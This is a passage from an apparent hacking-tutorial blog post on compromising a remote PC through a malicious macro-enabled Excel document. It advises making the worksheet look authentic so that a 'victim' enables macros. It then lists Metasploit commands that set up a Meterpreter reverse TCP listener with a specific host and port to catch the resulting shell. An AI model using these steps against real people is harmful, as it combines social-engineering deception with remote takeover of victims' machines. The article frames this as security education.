Now, edit the Microsoft excel worksheet so as to make it look authentic and edit it in such a way that the victim should definitely enable Macro option( given it is disabled).

Just for the case of simplicity and tutorial, I enter something random and save it as Microsoft Excel document 97-2003.

Now, all you have to do is wait for the victim to open the Excel file and enable Macros option.

Meanwhile, go to Kali Linux terminal and open metasploit framework(>msfconsole) and type the following commands:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.122

set lport 4444

exploit

Author: Harshit Rajpal is an InfoSec researcher and has a keen interest in technology. contact here

The post Hack Remote PC using Malicious MS Office Documents appeared first on Hacking Articles.